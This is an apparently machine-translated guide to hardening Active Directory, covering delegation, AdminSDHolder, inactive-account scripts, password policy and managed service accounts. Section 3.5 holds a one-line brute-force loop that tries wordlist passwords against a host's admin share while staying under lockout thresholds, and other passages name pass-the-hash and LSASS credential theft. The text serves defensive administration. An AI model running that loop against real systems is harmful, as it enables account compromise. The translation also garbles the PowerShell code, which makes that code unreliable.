this, the two forests that are approved to be in fashion native 2003.

content Authenticated users all user accounts and computers that have logged on to a trusted domain (without selective authentication).

Msreport - Guillaume MATHIEU - All rights reserved It is also in the container ForeignSecurityPrincipal. This object can extend the group's
2.2 DELEGATE ADMINISTRATION WITH ORGANIZATIONAL UNITS

To delegate administration to the various teams Active Directory content administrators, it is necessary to design a topology organizational units
(OUs) that reflects the organization of society.

If you have a standalone IT team at each company's website, you can create an OU for each location of your company and delegate rights on
each OR IT staff in charge of this OR (this site).

If you want to delegate the administration of certain accounts / groups of department heads, you can create an OU for each service.

2.3 CREATE REGISTERED ACCOUNTS AND DEDICATED FOR ADMINISTRATION

It is fundamental to create user accounts dedicated to the administration of the directory. These accounts must be registered in order to trace
the changes made by each director. Logon with an administrator account should be possible over secure machines and dedicated to the
administration of the directory. If possible, the local logon with an administrative account to be blocked on other business machines.

For this reason, the administration teams generally have two accounts:
• An account to log on the administrative machinery. Active Directory administration tools must be installed on these machines.

• A standard account without administrative privileges on the directory to access email, the Internet and other enterprise applications.

To restrict the machines on which users can login with their account administration, it is possible to use the following: Go to the properties of the
administrative user account at the tab Account then click on Log on To and check the box The Following computers. Enter the list of machines
where the user can open session (up to 1024 machines). This method prevents the local session opening but the user can still access
unauthorized machine via the network (access to shares).

An alternative to this method is to configure the GPO setting Deny logon locally a user group representing all administrative accounts and apply
this GPO on all machines in the domain except the administrative machinery. This is necessary because the attacks Pass The NTLM Hash and Access
Token Stealing ( with Incognito) may allow an attacker to recover access to all user accounts that have logged on to a machine (hence the need
to secure the administrative machinery).

DELEGATE 2.4 REQUIRED ONLY TEMPORARY

As previously stated, you must delegate the minimum rights to teams in charge of administering the contents of the directory.

The more you delegate rights, the more you increase the risk that an attacker increases privileges by compromising a management station and
using attacks like Pass The NTLM Hash and Access Token Stealing ( with INCOGNITO).

2.5 DEACTIVATE ACCOUNT AND INVITES THE ADMINISTRATOR ACCOUNT RENAME

The guest account must be disabled. Good security practice to rename view to disable the default administrator account. The rename little
impact because this account has a specific SID (ends with 500) and is therefore easy to find.

Msreport - Guillaume MATHIEU - All rights reserved


Disable administrator account can be a mistake, especially if you enable account lockout . Indeed, the administrator account (created by
the system) is the only one not to be locked.

2.6 audit PERMISSION ON OBJECTS ACTIVE DIRECTORY

It is possible to audit the permissions on the Active Directory with the console Active Directory Users and Computers, Active Directory
Administrative Center, with the tool Dsacls.exe or with PowerShell Get-ACL. I invite you to read these two articles if you want to create scripts to
audit the permissions on your directory:

http://blogs.technet.com/b/heyscriptingguy/archive/2012/03/12/use-powershell-to-explore-activedirectory-security.aspx

http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions

ANSI also provides an answer to this problem with its tool AD-permissions:
http://www.ssi.gouv.fr/IMG/pdf/Audit_des_permissions_en_environnement_Active_Directory_article.pdf
Sources installation of the AD-Permissions tool are available at:
https://github.com/ANSSI-FR/AD-permissions

2.7 audit TEMPORARY SUBJECT adminSDHolder

Active Directory provides a mechanism called AdminSDHolder permissions set to protect the sensitive groups: Account Operators,
Administrator, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, krbtgt, Print Operators, Readonly
Domain Controllers, Replicator, Schema Admins, and Server Operators.

The principle ?
When an object is defined as protected, the attribute AdminCoun t is set to 1 at this item. The inheritance of permissions parent objects in the
Active Directory is deactivated. A scheduled task called SDPROP will copy every 60 minutes (configurable interval) the permissions set on an
object model called AdminSDHolder at each protected object (such as the group Domain Admins).

The AdminSDHolder object in the SYSTEM container at the root of each Active Directory domain.

Msreport - Guillaume MATHIEU - All rights reserved


AdminCount attribute to the value 1.

no permission inherited and the latter has the same permissions as the AdminSDHolder object. The object also has guillaume.mathieu

SDPROP will reset the permissions of that object. We see in the example below the object guillaume.mathieu ( group member Domain Admins) has

Msreport - Guillaume MATHIEU - All rights reserved If a user is added to the protected group as Domain Admins, the latter is then protected too.
It is possible to define at what time interval runs the SDPROP task by modifying the following registry entry:

HKLM \ SYSTEM \ CurrentControlSet \ Services \ NTDS \ Parameters. \ AdminSDProtectFrequency


Microsoft also provides a procedure to start SDPROP manually:
http://support.microsoft.com/kb/251343/en-us
Note that when an account is no longer a member of a protected group, the attribute AdminCount remains at 1 and permission inheritance is not
reapplied. We must then manually reactivate the inheritance at the permissions of the object. This problem is described in the following
Microsoft:
http://support2.microsoft.com/kb/817433/en-us

You can configure AdminSDHolder not to protect certain groups. For this, we must modify the attribute dSHeuristics Object AdminSDHolder. For
more information :
http://support2.microsoft.com/kb/817433/en-us

For more information on AdminSDHolder and SDPROP:


http://technet.microsoft.com/fr-fr/magazine/2009.09.sdadminholder.aspx

Msreport - Guillaume MATHIEU - All rights reserved


2.8 ACTIVATE STANDBY SCREEN WITH PASSWORD

It is recommended to enable automatic standby screen with passwords after 5 to 10 minutes of inactivity. It is not uncommon for an
administrator forgets to lock his session. It is possible to configure the screen saver on the field of machine using a GPO setting in User
Configuration | Policies | Administrative Templates | Control Panel | Personalization.

You must get the result below.

Msreport - Guillaume MATHIEU - All rights reserved


2.9 TURN OFF INACTIVE ACCOUNTS

It is necessary to disable inactive user accounts. In general, longer absences last six months or 180 days. This is normally the responsibility of
the administrator of teams contents of the directory. But for many customers, management departures for providers is a very complex task.
Often providers accounts are not disabled. For this reason, the team in charge of the Active Directory administration must check on active
accounts but not used.

The solution proposed below to automatically disable user accounts and can generate an output file. It works with Windows domain controllers
2003 and later versions. It uses the PowerShell Module Quest ActiveRoles Management Shell. I invite you to use the plugin version 1.5 or 1.6 for
large directories because there is a memory leak problem with version 1.7 when you need to load a directory with more than 10,000 entries.

Deploy:
Install a domain member machines PowerShell Module Quest ActiveRoles Management Shell. This module can be downloaded at the following
address: http://software.dell.com/fr-fr/trials/#a
Create file c: \ _ adm \ scripts \ DisableUnusedAccount-180days.ps1 on a server. Start PowerShell ISE and copy the
code below. Set the variable $ datelimit and create a scheduled task to run this script.

# This script disables user accounts if:


# 1. The user account has not logged in for more than 180 days (based on the attribute
LastLogonTimestamp) if lastLogonTimestamp attribute is not empty.
# 2. lastLogonTimestamp is empty but the account has been created for more than 180 days (attribute
whenCreated)
# 3. Do not disable the account that as a value in the Description field "Account
Service **** "
# Adds PowerShell commands Quest Add-PSSnapin
Quest.ActiveRoles.ADManagement
# Log on to the domain controller MSREPORTDC1 Connect-QADService
MSREPORTDC1
# Configure Powershell to show up 100,000 results Set-QADPSSnapinSettings
-DefaultSizeLimit 100000
# VARIABLE =========================== ================ $ date = Get-Date

$ = $ Datelimit date.AddDays (-180)


$ SCOPESEARCH = "OU = Users, DC = msreport, DC = intra"
# ================================================== ====
# Generates the list of accounts to disable: $ DATABASE =
Get-QADUser - enable -SearchRoot $ SCOPESEARCH | Where-Object
{($ _. LastLogonTimestamp -the $ datelimit - AND $ _. LastLogonTimestamp -ne $ null) - GOLD

($ _. WhenCreated -the $ datelimit - AND $ _. LastLogonTimestamp-eq $ null)} | Select-Object


DN Description, Name, DisplayName, Email, SamAccountName, lastLogonTimestamp, whenCreated
# Generates an output file based on the current date. $ fileresult
= "C: \ _ adm \ Disable-account \ Accounts-DISABLED \ Comptesdesactives-" + $ ((Get-
date) .ToString ( 'dd-yyyy-MM')) + ". csv"
# echo $ fileresult
# Create headears postponement of the Echo file
"DN; Name; DisplayName; SamAccountName; Email; lastLogonTimestamp (Format
FR); whenCreated (FR Format) "| Out-File $ -FilePath fileresult -Encoding ASCII
# Generate report, update description field and disable account foreach ($ user in $
DATABASE) {

$ Newdescription = ""
# Analysis and updating the description field if ($ ($ user.description)
-notlike "* * Service Account") {

# Adds a new line to the results file

Msreport - Guillaume MATHIEU - All rights reserved


if ($ user.LastlogonTimeStamp -ne $ null) {

UserLastLogonTimeStamp $ = ($ ($ user.LastlogonTimeStamp) .ToString ( 'dd-yyyy-MM'))}

UserWhenCreated $ = ($ ($ user.whencreated) .ToString ( 'dd-yyyy-MM')) echo

"$ ($ User.DN) $ ($ user.Name) $ ($ user.DisplayName) $ ($ user.SamAccountName) $ ($ user.Email) User lastLogonTimestamp $; $


UserWhenCreated" | Out-File $ -FilePath fileresult -append
# Disable user account
Disable-QADUser $ -Identity ($ user.SamAccountName) if (($ ($
user.description)). Length -lt 1024) {

$ Newdescription = "This account has been disabled" + $ ((get-date) .ToString (DD-MM-yyyy ')) + "by your administrator -" + $ ($
user.description)
# Changing the value of the description field
Set-QADUser $ -Identity ($ user.SamAccountName) -Description $ newdescription} else {

$ Newdescription = "This account has been disabled" + $ ((get-date) .ToString ( "MM-dd-yyyy ')) +" by your administrator. "

# Changing the value of the description field


Set-QADUser -Identity $ ($ user.SamAccountName) -Description $ newdescription}}}

Msreport - Guillaume MATHIEU - All rights reserved


2.10 TOOLS TO STREAMLINE THE PARTY DELEGATION OF DIRECTORS

Active Directory natively allows to delegate permissions on the directory so very fine. There are many tools such as management consoles, PowerShell
the HTA scripts to be able to delegate the administration of the Directory of non-computer. These tools, however, do not allow:

• To have a tracking changes made to the objects (user account, group, OR).
• Manage membership in security groups based on the location of the user in the OR.

• To have a web interface to administer Active Directory.


• Impose a formalism in the input fields (required fields, seized format of the phone number ...).

• To run scripts to perform additional tasks. When a user deletes an account, it is not possible to automatically delete personal directory, the
mailbox for example. These actions must be performed manually.

• To require the approval of a third party to make a change on an Active Directory object.

The tool Dell ActiveRoles Server 6.9 (ARS 6.9) incorporates the following features to meet these needs:

• Dynamic groups: addition of a resource in a group according to an attribute value or as the location of the user (LDAP path). This feature
allows for example to provide access to the intranet for all internal users of the company (based on the value of the attribute EmployeeType).

• Temporary groups: adding an object in a group for a limited time. This can help give temporary access to a service provider.

• The approval workflow (workflows) one or more persons can validate or not certain actions on the directory by others. An action
performed on a user account can trigger eg sending a mail to this user.

• A customizable web console: The tool comes with an MMC (very easily customized) and a web console. The latter can be fully
customized (changes in forms of management objects, adding commands ...). Take the case of a company that would use the attribute extensionAttribute2
to store license information Office 365. This attribute is not present not default in the properties of a user account in the console Active
Directory Users and Computers.

• The history of actions taken on an object and history of actions taken by an administrative account: officials will be delighted to find
the person who

Msreport - Guillaume MATHIEU - All rights reserved


performed a specific action on the directory. Watch out for this, it is important to delegate the Directory administrative rights only through Dell
ActiveRoles Server (ARS). The people in charge of the administration of the directory should have no access through Microsoft native tools
(ARS does not replicate permissions in the Active Directory).

• The policies (strategies): What DSI has not dreamed of one day having to book with reliable and respectful of validated formalism. With
ARS policies, you can force the teams in charge of the directory management to enter certain fields with a particular formalism (phone
number in international format, last name in capital letters, company and address field completed ...). ActiveRoles Server provides via the
module script Policies run VBS / PowerShell scripts before or after seizure (among others) a form. Nothing prevents you to automatically
configure

application access when creating a user account


(Provisioning).

• The deprovisionning: ActiveRoles Server also has the function deprovisionning which will allow us to define a certain number of tasks to
be performed automatically when

Msreport - Guillaume MATHIEU - All rights reserved


wants to remove access to a person (the account can be disabled, a script that will remove access to levels of application ...).

• Creating virtual attribute: ActiveRoles Server allows to create virtual attributes. These do not exist in the Active Directory but can be used
by the LRA scripts. For example you can create a virtual attribute Site. A Policy ARS script then will automatically complete the address
fields, city and country of the user account depending on the value of this field Site.

• The delegation of administration this is by far the most important feature of the tool
ActiveRoles Server. It is possible to delegate only the rights to administrators in the ActiveRoles Server tool. These administrators have no
rights in the Active Directory. They are therefore forced to use the ActiveRoles Server tool to perform administrative tasks. This feature
ensures that all administrative actions will be drawn into the tool. This also helps delegate rights very precisely without affecting software
that rely on Active Directory. You can for example prevent HELPDESK users to see the organizational units they do not have the right to
manage without disrupting the operation of other software that would build on the directory.

The product allows for very many actions but has the following limitations:
• For advanced needs, it will be necessary to create policy ARS scripts. An SDK explains how to develop these scripts. The development of
these scripts can be long.
• Think separate historical database of the basic pattern data. This is a check box during installation.

• SQL knowledge is recommended especially if you want to deploy two servers that replicate the same configuration databases and history.

Msreport - Guillaume MATHIEU - All rights reserved


3 SET A PASSWORD COMPANY POLICY
It is not enough to force users to use a password of 24 characters, with special characters and get them to change it every 30 days to have a
policy of secure passwords. With this type of policy, users will just write their password below their keyboard, on paper or in their mobile phone.
The remedy is then worse than the disease. Securing passwords for user accounts is a much more complex task that requires:

• To list the needs and constraints of the enterprise-level passwords.


• Determine how to reduce the number of passwords users have to remember.
• To understand how and that stores passwords in Active Directory. We will see as a domain administrator can recover passwords if they
are stored in LMHash size (sometimes it even works with the NTHASH).

• To know the password management tools integrated into Active Directory.


• Know the software tools that extend the management capabilities passwords.

• Reduce the number of user accounts with the option Password never expires .
• Replacement service accounts (which have the option Password Never expires by
Managed Services Account ( MSA) or Group Managed Services Account ( GMSA).
• To list all the accounts that have not changed their passwords for years.
• How, why and where are stored passwords on machines domain (other than domain controllers).

• Finally set from all of these strategy target passwords in coordination with the management of the company, the Helpdesk team
(responsible for resetting the passwords) and representatives.

3.1 ANALYZE THE BUSINESS NEEDS FOR PASSWORD POLICY

The first basic step is to define the need for enterprise-level passwords. For this you need to ask yourself the following questions:

• Users they accept to have a 10-character password that changes every 90 or 120 days (correct level of security)? Is a change
management necessary?

• What are the user accounts that have significant administrative privileges on your information system? These accounts should have a
password of 16 characters minimum (24 characters minimum for service accounts).

• What is the level of security required by the company? The company does have legal requirements (contract with the Ministry of Defense,
financial organization)? Is the security level homogeneous for all services / enterprise users?

• The complexity of under Active Directory Password requires a 6-character password with a minimum of 3 typefaces from the existing 5
(lowercase, uppercase, number and special characters, Unicode character). The password P @ ssword is considered a complex password
with Active Directory. Such passwords estil secure enough for your business?

• Do you have a team in charge of the reset password (if the user has forgotten his password? Are they available 24/7?

• How to validate that the user calls to reset their password is who he claims to be?

• How to reset a user's password when it is not connected to the corporate network?

• How many login / different passwords users must they remember?

We will see in the next paragraph the tools integrated with Active Directory, third-party solutions and actions to be implemented to meet all
business needs

Msreport - Guillaume MATHIEU - All rights reserved


3.2 REDUCE THE NUMBER OF LOGIN / PASSWORD DIFFERENT

3.2.1 MIMIC THE NUMBER OF LOGIN / PASSWORD TO REMEMBER

Standard users can average store up to 3 login / different passwords. Beyond these, the 4 following phenomena are observed:

1. If passwords expire every 90/120 days and the Active Directory complexity is enabled, users confuse different passwords. The call IT support
rate for password reset requests increases sharply.

2. If user accounts Lock is on, the call IT support rate unlock accounts increases sharply because users incorrectly enter their password multiple
times.

3. Users write their different logins / passwords on paper, text or behind their keyboard file.

4. Users trying to align the passwords for different accounts and change only one character when changing passwords.

All this penalizes the company's productivity and reduces the company's security.
It is therefore necessary to reduce the number of login / password that a user must remember.

3.2.2 C Iles YOUR APPLICATIONS FOR S ' AUTHENTICATION WITH A CTIVE D irectory

Business applications typically allow to perform LDAP authentication over SSL. Often, they also enable authentication protocols such as NTLM
or Kerberos. We will see below how to allow Apache Linux Kerberos to authenticate with Active Directory domain controllers.

On an Active Directory domain controller:


Generate file keytab with the following command:
ktpass / out msreporthttp.keytab / princ HTTP/apache.msreport.be@MSREPORT.BE / mapuser msreporthttp@MSREPORT.BE / ptype
KRB5_NT_PRINCIPAL / crypto RC4-HMAC-NT / pass msreporthttppass

This will automatically create a ServicePrincipalName (SPN) at the user account


msreporthttp and generate the file msreporthttp.keytab required to implement Kerberos authentication. We will see later in this paper what a ServicePrincipalName.

On the Linux / Apache:


Download and configure the Kerberos client
Download and configure the Kerberos module for Apache. Configure the NTP client to synchronize to a
domain controller. configuring
Apache to ask Authentication and press the file
msreporthttp.keytab generated on the domain controller. For more details on the procedure, I invite
you to read the following article:
https://www.johnthedeveloper.co.uk/single-sign-on-active-directory-php-ubuntu

Msreport - Guillaume MATHIEU - All rights reserved


3.2.3 U SING THE SAFE W INDOWS

If you have application with a login / password rarely or never expire (this is not a good practice), you can save the password in Windows safe.
The user will no longer enter the login / password as it will be saved in the user profile. The Windows safe ( Credential Manager) is accessible
from the control panel.

3.2.4 U SING THE FEDERATION OF PROTOCOLS OF IDENTITY

CIOs are increasingly likely to switch to applications hosted in the cloud as Microsoft Office 365 or SalesForce. These solutions have many
advantages but contribute to increase the number of logins / passwords that users must memorize.

identity federation solutions (such as Microsoft ADFS or Ping Identity) allow to address this problem by establishing a relationship between a
configuration of Active Directory ( Identity Provider or IDP) and an application hosted in the cloud ( Service Provider or

SP). The advantage of this solution is that the scope of this trust is much smaller than that of a trust relationship between two domains.

Msreport - Guillaume MATHIEU - All rights reserved


3.3 WORDS OF MANAGEMENT TOOLS PASSWORD MICROSOFT

The strategy of passwords for user accounts can be configured in several locations:
• At the component level Password Policy Group Policy Default Domain Policy.
• At the container level PSO ( Password Policy Object).
• In terms of Active Directory user accounts.

It is necessary to understand the difference between changing passwords and resetting passwords. A change of passwords is performed by a
user. The latter must know his old password to perform the procedure. A reset password is performed by Active Directory administrator. The
administrator does not need to know the old user password. The historic setting of the password (see below) is ignored when a reset
passwords.

3.3.1 ES STRATEGIES OF THE PASSWORD D EFAULT D omain P olicy

With Active Directory domain controllers (all versions), administrators can configure their strategy passwords at the Default Domain Policy in
Computer Configuration | Policies | Security Settings | Account Policies | Password Policy. Microsoft defines the following criteria:

maximum lifetime of a password:


Active Directory determines whether a password has expired based on the value of the attribute
pwdLastSet ( date of last change / reset password) the date and the maximum lifetime of the password. Note that the attribute pwdLastSet is a
counter which is incremented from January 1, 1601.

The history of passwords:


Active Directory will save a number of old passwords in the attribute ntPwdHistory
User account (and lmPwdHistory if storage of passwords in LM hash format is enabled). The historical passwords will prevent a user to change
their password with this password in the history. An administrator, however, may reset the password with a value present in the history of
passwords.

minimum lifetime of passwords:


Active Directory prevents a user to change their password during the set time. The goal is to prevent the user to change their password X time to
bypass

Msreport - Guillaume MATHIEU - All rights reserved


History passwords. This feature does not prevent a user to change their password if the option User must change password at next logon was
defined at the user account by an administrator (after resetting the password of the user, for example).

The minimum length of the password:


A minimum size of 10 characters is recommended for standard users, 16 characters for sensitive users (VIP accounts with administrative
privileges) and 24 characters for service accounts. This size allows you to protect against Rainbow Table that can recover a password from NTHASH
( Attribute Value UnicodePwd).

The complexity of passwords:


The password must have at least 6 characters, contain no more than 2 consecutive characters of the account name and the full name of the
account, contain 3 typefaces from the existing 5 (uppercase, lowercase, numbers and characters @ special as other Unicode characters such
as Japanese characters). The complexity of passwords is applied only when a user changes their password or when an administrator resets.
The complexity of the password does not guarantee that all directory user accounts have a complex password. A password like password1 is
considered complex. We will see that there are third-party tools like Hitachi ID Password Manager that extend the complexity of passwords
criteria (dictionary word blocking).

Enabling the storage of passwords reversible size:


This option is only used to authenticate with the protocol DIGEST. It should not be activated for security reasons because the passwords are
then deciphered easily.

Password Policies set at the DefaultDomainPolicy apply for users of Active Directory accounts, but also for the SAM basic user
accounts on domain member machines.

It is important to note that the password strategies can be defined as a level of Group Policy Default Domain Policy although the graphical
Windows suggests that one interface can define at any GPO linked to an OU.

In fact passwords strategies defined at an OR apply only to the SAM basic user accounts on domain member machines.

Msreport - Guillaume MATHIEU - All rights reserved


3.3.2 ES OBJECTS (PSO FINE-grained PASSWORD)

They allow you to set the same password policy settings than the Default Domain Policy but users and specific groups. The PSO (also called finegrained
password) appeared with native mode 2008. In Windows 2008 R2, the PSOs were to be created manually ADSIEDIT.MSC. Since Windows 2012
R1, a wizard for creating PSOs is available in the console Active Directory Administrative Center

(ADAC). This requires going into the container System | Password Settings Container. In the window Tasks, click on New | Password Settings.

In the example below, we create a password policy for all user group members GG_Administrative_Accounts.

Better to define a strategy words granular pass that use at least the security settings of the Default Domain Policy. This is indeed the most
restrictive combination of the two that apply to the user. In the example below, the Default Domain Policy requires a password of 8 characters.
The PSO requires 15 characters. The user group member GG_Administrative_Accounts must have a password of 15 characters.

Other advantages of the objects PSO (fine-grained password)


They only apply to domain user accounts contrary to Default Domain Policy
which applies to user accounts and Active Directory user accounts to the local SAM database. For more information, see the Microsoft link
below:
http://technet.microsoft.com/en-us/library/cc770842(v=ws.10).aspx

3.4 TOOLS MANAGEMENT THIRD OF PASSWORDS

Microsoft native tools have many limitations:


• If you forget the password, the user can not reset his own password.

• Microsoft native tools does not guarantee the identity of the user requesting a reset passwords.

Msreport - Guillaume MATHIEU - All rights reserved


• It is not possible to configure the complexity of passwords to ban certain words from the dictionary.

3.4.1 R EINITIALISER ITS PASSWORD NOT CONTACT THE COMPUTER TEAM

The PWM tool (open source and free) makes available a web interface to reset their password. The user connects to that interface and must
meet secret and personal issues as his favorite band, the nickname of his spouse or pet. Pay as tools Hitachi Password Manager or Microsoft
Forefront Identity Manager also possible to have this type of function.

The principle of these tools is relatively simple, however their implementation is complex. The personal data that you store in these tools require
to make a declaration to the CNIL and consult the unions. The choice of questions can also be highly political and sensitive.

PWM To download: http://code.google.com/p/pwm/


For download a trial version of Hitachi Password Manager Id: http: // hitachi-
id.com/password-manager/

3.4.2 G NSURING ' IDENTITY OF THE USER

The implementation of a reset tool password-based security questions will also ensure the identity of the calling user and protect the company
against a striker who is posing as an employee of society to obtain access.

3.4.3 C Iles COMPLEXITY PASSWORD

The complexity of passwords is managed by the DLL Microsoft Windows Passfilt.dll. It is possible to develop a DLL Additional to impose the use
of more complex passwords and configure Windows to manage this second DLL. For simplicity, the two DLL will analyze the password supplied
by the user. If both return true then the password is accepted. Otherwise, an error message appears and the change / reset the password is
denied. All information provided by Microsoft to develop a DLL Custom is available at:

http://msdn.microsoft.com/en-us/library/ms721766.aspx
http://msdn.microsoft.com/en-us/library/ms721849.aspx#password_filter_functions
http://msdn.microsoft.com/en-us/library/ms721884.aspx http://msdn.microsoft.com/ en-us / library / ms722458.aspx

There is a sample implementation (not tested / recommended) available at:


https://thangletoan.wordpress.com/2012/08/06/
http://www.devx.com/security/Article/21522/0/page/3
https://mendel129.wordpress.com/2014/05/27/passwordfilters-in-windows/

This DLL is very critical, it is recommended to invest in a paid solution like


Hitachi ID Password Manager.

Msreport - Guillaume MATHIEU - All rights reserved


3.5 FIND THE PASSWORD USER VIA THE NETWORK

To retrieve a user's password over the network, an attacker needs a lot of time. It must not exceed a certain threshold could trigger lock the user
account or be detected by IDS. The good pace would be to test one password per minute. Assuming that the password expires after 60 days,
an attacker could test 86400 passwords during this period.

The script below can test all the passwords in the file c: \ password.txt
(One per line password) for guillaume account on the 192.168.1.15 machine. If the command is successful, a player
on the maps V C $ share of the machine.
For / F% i IN (c: \ password.txt) do use @net V: \\ 192.168.1.15 \ c $% i / u guillaume

How to protect the lock accounts and audit of connection failures


Users should have passwords with a minimum of 10 characters with complexity enabled. This will generally ensure that an attacker does not
succeed in finding the password in less than 86400 attempts.

Enable account lockout on very low thresholds (very failures passwords) will mainly block the clumsy users or who do remember more
passwords. Better to set the lock accounts on important thresholds and record these authentication failures over a longer time. Microsoft blocks
the threshold to 999 attempts. The consideration of duration with resetting the password failure counter will also set the duration of the account
lockout (stress the Microsoft solution).

If account lockout is enabled, an attacker can specify voluntarily bad passwords to generate a huge denial of service. It is mainly for
this reason that account lockout should be turned off in my opinion.

An alternative to locking accounts (method) is to analyze the log Security all domain controllers in search of authentication failures and generate
an alert upon detection. This methodology would also detect connection attempts with low thresholds (test password per minute) by counting
the number of authentication failure in the long term. A sample script is provided later in this document (part audit).

3.6 USE AND MSA GMSA OBJECTS TO SERVICES AND TASKS PLANNED

For many customers, user accounts are used to run services and scheduled tasks. These accounts usually have very important privileges
(sometimes Domain Admins) have a password that does not expire and are not restricted in their use. They can for example open sessions on
any area of ​the machines. If the compromise of a service with a tool like Metasploit, an attacker can retrieve access corresponding to the user
account performing this service (in our example, one group member account Domain Admins). It can also recover the password of the service
account by analyzing memory LSASS.EXE machine process with a tool like CAIN (for more information, see later in this document).

Msreport - Guillaume MATHIEU - All rights reserved


Microsoft began offering a solution with Windows 2008 R2 and MSA (Management Services Accounts). MSA is a subject new object type (class msDS-managedserv

An MSA, as a computer account password automatically changes every 30 days words (at the same time that the password for the computer
account). An MSA does not apply password policies of the Default Domain Policy and do not apply the PSO settings. A Managed Service
Account (MSA) however, some limitations:

• It is not possible to use the same MSA on multiple machines. It is linked to a specific computer account. It is therefore not possible to use
MSA with a Microsoft cluster FailOver or NLB cluster (more Kerberos authentication).

• Many applications do not support MSA. It is therefore necessary to validate the support MSA for each application. Microsoft SQL Server
2012 supports the use of a
MSA if SQL Server is deployed in standalone mode (not clustered). For more information :
http://blogs.msdn.com/b/sqlosteam/archive/2014/02/19/msa-accounts-used-with-sql.aspx
I invite you to read the following Microsoft articles for more information on MSA:
http://blogs.technet.com/b/askds/archive/2009/09/10/managed-service-accounts-understandingimplementing-best-practices-and-troubleshooting.aspx
http://technet.microsoft.com/fr -fr / library / dd548356 (v = ws.10) .aspx

Microsoft has improved the MSA Windows 2012 R2 and created a new object type (class
msDSGroupManagedServiceAccount) called Group Managed Service Account ( GMSA). Contrary to MSA a GMSA is no longer linked to the
computer account of the machine. It is the service
Kerberos Key Distribution Center (KDC) that changes the password of a GMSA.
GMSA the same object can be used on different machines. The cluster FailOver service should not run with a GMSA but services hosted by
the cluster can run with GMSA. This functionality was not possible with an MSA object. Note that the GMSA are not yet supported with Microsoft
SQL Server 2012 ( contrary to MSA). I invite you to read the following articles on the Microsoft GMSA:

http://blogs.technet.com/b/askpfeplat/archive/2012/12/17/windows-server-2012-group-managedservice-accounts.aspx

http://technet.microsoft.com/en-us/library/jj128431 (US)
http://technet.microsoft.com/fr-fr/library/hh831782.aspx (FR)

MSA and GMSA are stored in the container Managed Service Account at the root of the domain.

How to Configure the VMware Tools service on SRV2012C machine with MSA:
Install the Active Directory module for PowerShell on SRV2012C in the Server Manager.

Msreport - Guillaume MATHIEU - All rights reserved


command to create the MSA object.
New Browser ADServiceAccount vmwaretools -RestrictToSingleComputer
By default in Windows 2012, the command New ADServiceAccount creates a GMSA. the parameter
RestrictToSingleComputer creates an MSA. MSA associate with the
computer account.
Add-ADComputerServiceAccount -Identity SRV2012C -ServiceAccount vmwaretools
Install the MSA on SRV2012C
Install-ADServiceAccount vmwaretools
Validate the operation of MSA using the following command:
Test-ADServiceAccount vmwaretools
Check that the created object is not a GMSA MSA. Add the MSA to a Administrators group of the base SAT local
machine. Configure Service vmwaretools to use the MSA.

Msreport - Guillaume MATHIEU - All rights reserved Then type the following
3.7 LIST ALL ACCOUNTS THAT HAVE NOT CHANGE PASSWORDS FOR SEVERAL YEARS

It is necessary to identify accounts that have not changed their passwords from more than 5 to 10 years (configured with a password that never
expires). These are usually former generic service accounts, non-nominal, known to all IT staff and employees / providers who are not part of
society, the use of which is not well known (several applications use the same Service account).

The approach :
1. You must identify the applications that use these service accounts using the auditing feature of Active Directory connections (see later in this
document).

2. You must identify the risk in terms of security of each of these accounts. The password for this account is it complex? The password is it
known by former employees / providers? What is the privilege level of the account?

3. You must plan campaigns to change passwords for service accounts. Whenever possible, set passwords to 24 characters minimum for
service accounts. This ensures that the password is not stored in the format LMHash in the directory (14 characters maximum).

If it is not possible to change the password of a service account, you must reset it with its current value a number of times corresponding to the
historical value of passwords + 1 after disabling storing passwords in LM hash format (see later in this document). If history passwords is 15
passwords, reset 16 times the password.

If the password does not meet complexity requirements, it will be necessary to temporarily change Default Domain Policy in order to redefine the
password identically (for really blockers cases).

You must do the same action if you have disabled the encryption LMHash format. The LM hash is removed at an existing account attribute dBCSPwd
that when changing the password for the user account.

Some technical tips:


The following PowerShell command to list the accounts whose password has not been changed since 365 days. It requires the deployment of
PowerShell Module Dell ActiveRoles Management Shell 1.6 and works with controllers in Windows 2003 and later domain (free download http://software.dell.com/fr-fr

Add-PSSnapin Quest.ActiveRoles.ADManagement Get-QADUser


-PasswordNotChangedFor 365

Msreport - Guillaume MATHIEU - All rights reserved


3.8 RESET PASSWORD TO USERS WITH CARDS CHIPS

During an interactive logon (local or via Remote Desktop), users can authenticate with their smart cards (instead of a login / password).
However, access to network resources is done transparently by the system using the NTHASH (HASH password). This NTHASH is stored in
memory after the interactive logon process by lsass.exe. Moreover, when the box Smart card required for interactive logon is checked, the
password is automatically generated by the system but configured not to change.

For this reason, it is advisable to periodically reset the password of these accounts (once every 6 months). This action should be performed
when the user is not working.

3.9 RESTRICT USE OF THE OPTION " PASSWORD NEVER EXPIRES "

No user account must not have that option except service accounts. The following PowerShell command to list the accounts whose password
never expires. It requires the deployment of PowerShell Module Dell ActiveRoles Management Shell 1.6 and works with controllers in Windows
2003 and later domain (free download http://software.dell.com/fr-fr/trials/#a).

Start PowerShell and type the following commands:


Add-PSSnapin Quest.ActiveRoles.ADManagement Get-QADUser
-PasswordNeverExpires

Msreport - Guillaume MATHIEU - All rights reserved


3.10 STORAGE PASSWORD WITH ACTIVE DIRECTORY

3.10.1 THAT DO ' FOOTPRINT (OR HASH)?

A user account password (or computer account) must not be stored in clear in an LDAP directory for security reasons. Therefore, Active
Directory stores the password for all computer accounts and all user accounts in the form of an impression (also called HASH). Two different
passwords do not generate the same fingerprint as the mathematical function generation footprint (or Hash) is unidirectional. It is not possible to
recover the original password from its footprint. The rainbow tables possible to overcome this limitation by calculating a fingerprint for each
possible password in a database. An attacker can then search the password corresponding to the impression it has. I invite you to visit the
website below:

http://fr.wikipedia.org/wiki/Rainbow_table.
Some fingerprint generation algorithms allow the use of a salt (also called seed). Salt is a value that appends (adds) the original password. This
will enhance the security of passwords with a small number of characters. With the use of a salt, two identical passwords do not produce the
same footprint.

Active Directory can generate two types of fingerprint for an account password user / computer:

• The LMASH: very low security level (disable mandatory).


• The NTHASH: variable level of security (depending on the complexity of the password). The generation function
of LMHash and NTHASH does not use salt.

3.10.2 THE LMHash (L AN M ANAGER H ASH)

The LM hash is stored in the attribute dBCSPwd. The history of passwords is stored at the attribute lmPwdHistory. These two attributes are
protected by the operating system against read access (including a Member user group Domain Admins). In the example below, the Active
Directory is configured to store the password in the format LMHash.

After changing the account password guillaume.mathieu , attribute dBCSPwd remains unavailable (displayed Not set).

Msreport - Guillaume MATHIEU - All rights reserved


We will see later in this document it is possible to recover the contents of the attributes
